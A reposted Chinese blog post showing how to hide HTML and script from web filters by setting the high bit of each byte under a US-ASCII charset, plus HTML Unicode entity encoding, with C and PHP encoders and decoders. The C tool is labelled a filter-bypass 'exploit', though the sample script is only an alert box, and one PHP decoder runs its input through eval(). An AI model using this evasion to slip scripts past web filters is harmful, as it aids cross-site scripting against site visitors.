转载:二少's Blog
US-ASCII加密,就是把7bit转换为8bit
原始的代码
程序代码: 程序代码
<
html
>
<
title
>
sprite's Blog
</
title
>
<
script
>
alert('Hello World')
</
script
>
<
body
>
<
a
href
="http://www.spr1t3.com"
>
http://www.spr1t3.com
</
a
>
</
body
>
</
html
>
加密后的代码
程序代码: 程序代码
<
html
>
<
head
>
<
meta
http-equiv
="Content-Type"
content
="text/html; charset=US-ASCII"
/>
<
title
>
IE
</
title
>
</
head
><
body
>
艰繇炀娂糸綮寰箴蜷翦犅祜缂轸戾緤俭泸轲艟犰弪舁屐祜犠矧熹З集筱蜷痿緺娂怙澌緤坚犺蝈娼㈣趑鸷鼢鳟箴虮舫镯⒕梏麴函鼢痱濒钞泔砑緤集怙澌緤集梏盱?
</
body
></
html
>
加密解密程序
程序代码:
#include
<
stdio
.h
>
int main(int argc,char** argv) { FILE *fp; char ch; printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n"); if(argc
<
2
){ printf("\nUsage: \n\t %s srcfile
>
destfile\n",argv[0]); return -1; } if((fp=fopen(argv[1],"r"))==NULL){ printf("File %s open Error",argv[1]); return -1; }//指定编码为US-ASCII是必须的 printf("\n
<
html
>
\n
<
head
>
\n
<
meta
http-equiv
=\"Content-Type\"
content
=\"text/html;
charset
=US-ASCII\"
/>
\n
<
title
>
Bypassing of web filters by using ASCII Exploit By CoolDiyer
</
title
>
\n
</
head
><
body
>
\n"); while((ch=fgetc(fp))!=EOF){ ch|=0x80; //把7位变成8位,这句话是核心,解密时用 ch&=0x7f printf("%c",ch); }; fclose(fp); printf("\n
</
body
></
html
>
\n"); return -1; } 解密只要把每个字节的高位置0即可。还有一个更简单的方法,网页“另存为”保存的时候,在语言选项将“西欧(windows)”改成“简体GB2312”,然后保存在本地。
unicode编码前
程序代码: 程序代码
<
html
>
<
title
>
7jdg's Blog
</
title
>
<
script
>
alert('Hello World')
</
script
>
<
body
>
<
a
href
="http://1v1.name"
>
http://1v1.name
</
a
>
</
body
>
</
html
>
unicode编码以后的形式
程序代码: 程序代码
<
html
>
<
title
>
7jdg's Blog
</
title
>
<
script
>
alert('Hello World')
</
script
>
<
body
>
<
a
href
="http://1v1.name"
>
http://1v1.name
</
a
>
</
body
>
</
html
>
加密程序
程序代码: 程序代码 <? $text = "http://1v1.name"; preg_match_all("/[\x80-\xff]?./",$text,$ar); foreach($ar[0] as $v) echo "&#".utf8_unicode(iconv("GB2312","UTF-8",$v)).";"; ?> <? // utf8 -> unicode function utf8_unicode($c) { switch(strlen($c)) { case 1: return ord($c); case 2: $n = (ord($c[0]) & 0x3f) << 6; $n += ord($c[1]) & 0x3f; return $n; case 3: $n = (ord($c[0]) & 0x1f) << 12; $n += (ord($c[1]) & 0x3f) << 6; $n += ord($c[2]) & 0x3f; return $n; case 4: $n = (ord($c[0]) & 0x0f) << 18; $n += (ord($c[1]) & 0x3f) << 12; $n += (ord($c[2]) & 0x3f) << 6; $n += ord($c[3]) & 0x3f; return $n; } } ?> 这样的unicode编码,也可以通过另存为解密
或者是
程序代码: 程序代码 <?php $str = "http://1v1.name"; $str = preg_replace("|&#([0-9]{1,5});|", "\".u2utf82gb(\\1).\"", $str); $str = "\$str=\"$str\";";
eval($str); echo $str;
function u2utf82gb($c){ $str=""; if ($c < 0x80) { $str.=$c; } else if ($c < 0x800) { $str.=chr(0xC0 | $c>>6); $str.=chr(0x80 | $c & 0x3F); } else if ($c < 0x10000) { $str.=chr(0xE0 | $c>>12); $str.=chr(0x80 | $c>>6 & 0x3F); $str.=chr(0x80 | $c & 0x3F); } else if ($c < 0x200000) { $str.=chr(0xF0 | $c>>18); $str.=chr(0x80 | $c>>12 & 0x3F); $str.=chr(0x80 | $c>>6 & 0x3F); $str.=chr(0x80 | $c & 0x3F); } return iconv('UTF-8', 'GB2312', $str); } ?>
|